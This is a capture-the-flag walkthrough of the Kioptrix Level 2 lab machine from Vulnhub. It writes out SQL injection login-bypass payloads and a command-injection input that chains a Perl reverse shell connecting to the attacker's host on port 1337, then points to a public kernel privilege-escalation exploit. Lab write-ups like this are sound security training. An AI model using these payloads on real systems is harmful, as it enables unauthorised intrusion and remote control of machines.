Vulnhub - Kioptrix Level 1.1 (#2) Walkthrough

So, I’m here with my second write-up for Vulnhub – Kioptrix Level 2 challenge. So, we usually start by doing some enumeration on services. but before that we have to find out the IP Address of our machine.

Information Gathering

netdiscover will scan for all devices connected on your network or you can use arp-scan your choice.

Arp-scan

arp-scan --interface=eth0 --localnet

1	arp-scan --interface=eth0 --localnet

Now we have our target IP Address let’s take a look which services are running on that server.

Nmap

nmap -oA nmap -sC -sV 192.168.1.8

1	nmap -oA nmap -sC -sV 192.168.1.8

These are the services running on targeted machine.

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
3306/tcp open  mysql

PORT STATE SERVICE

22/tcp open ssh

80/tcp open http

111/tcp open rpcbind

443/tcp open https

631/tcp open ipp

3306/tcp open mysql

Port 80 is Running Apache httpd 2.0.52 (CentOS)

Let’s take a look, http://192.168.1.8

Remote System Administration Login, Username and Password field let’s take a look at page source might we find something interesting.

<form method="post" name="frmLogin" id="frmLogin" action="index.php">
	<table width="300" border="1" align="center" cellpadding="2" cellspacing="2">
		<tr>
			<td colspan='2' align='center'>
			<b>Remote System Administration Login</b>
			</td>
		</tr>
		<tr>
			<td width="150">Username</td>
			<td><input name="uname" type="text"></td>
		</tr>
		<tr>
			<td width="150">Password</td>
			<td>
			<input name="psw" type="password">
			</td>
		</tr>
		<tr>
			<td colspan="2" align="center">
			<input type="submit" name="btnLogin" value="Login">
			</td>
		</tr>
	</table>
</form>

<!-- Start of HTML when logged in as Administator -->

<tr>

<b>Remote System Administration Login</b>

</td>

</tr>

<tr>

<td width="150">Username</td>

</tr>

<tr>

<td width="150">Password</td>

<td>

</td>

</tr>

<tr>

</td>

</tr>

</table>

</form>

Nothing special but since we do not have any security checks on username and password field we can try SQLi.

BurpSuite

Below is the request which we’re sending and check the response we got.

Request:

POST /index.php HTTP/1.1
Host: 192.168.1.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.8/
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

uname=1' or '1' = '11&psw=1' or '1' = '1&btnLogin=Login

POST /index.php HTTP/1.1

Host: 192.168.1.8

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.1.8/

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 55

uname=1' or '1' = '11&psw=1' or '1' = '1&btnLogin=Login

Response:

<!-- Start of HTML when logged in as Administator -->
	<form name="ping" action="pingit.php" method="post" target="_blank">
		<table width='600' border='1'>
		<tr valign='middle'>
			<td colspan='2' align='center'>
			<b>Welcome to the Basic Administrative Web Console<br></b>
			</td>
		</tr>
		<tr valign='middle'>
			<td align='center'>
				Ping a Machine on the Network:
			</td>
				<td align='center'>
				<input type="text" name="ip" size="30">
				<input type="submit" value="submit" name="submit">
			</td>
			</td>
		</tr>
	</table>
	</form>

<b>Welcome to the Basic Administrative Web Console<br></b>

</td>

</tr>

Ping a Machine on the Network:

</td>

</td>

</tr>

</table>

</form>

So, it was simply SQL Injection (1′ or ‘1’ = ‘1).

We have tested manual SQL Injection. Let’s test SQLmap now.

SQLmap

It generated the payload for us!

Payload: uname=-2356' OR 1260=1260-- DpYb&psw=admin&btnLogin=Login

1	Payload: uname=-2356' OR 1260=1260-- DpYb&psw=admin&btnLogin=Login

Reverse Shell

There’s an another field to run a ping command and tested SQL Injection vulnerabilities again and found a simple ‘;‘ semicolon can be used to bypass this.

So this is what i did.

192.168.1.1; perl -e 'use Socket;$i="192.168.1.9";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

1	192.168.1.1; perl -e 'use Socket;$i="192.168.1.9";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

And i ran “nc -lvp 1337″ on my machine to get reverse shell.

Now we’re going after root access.

Root

By running LinEnum.sh script we couldn’t find anything interesting but you take a look at kernel version we have some exploits available for that kernel version.

Don’t Miss: A Guide To Linux Privilege Escalation

[-] Kernel information (continued):                                                           
Linux version 2.6.9-55.EL (mockbuild@builder6.centos.org) (gcc version 3.4.6 20060404 (Red Hat 3.4.6
-8))

[-] Kernel information (continued):

Linux version 2.6.9-55.EL (mockbuild@builder6.centos.org) (gcc version 3.4.6 20060404 (Red Hat 3.4.6

-8))

After doing Google searches found that this exploit might work so i gave it a try and it actually worked.

Don’t Miss: Linux Privilege Escalation Scripts

https://www.exploit-db.com/exploits/9545/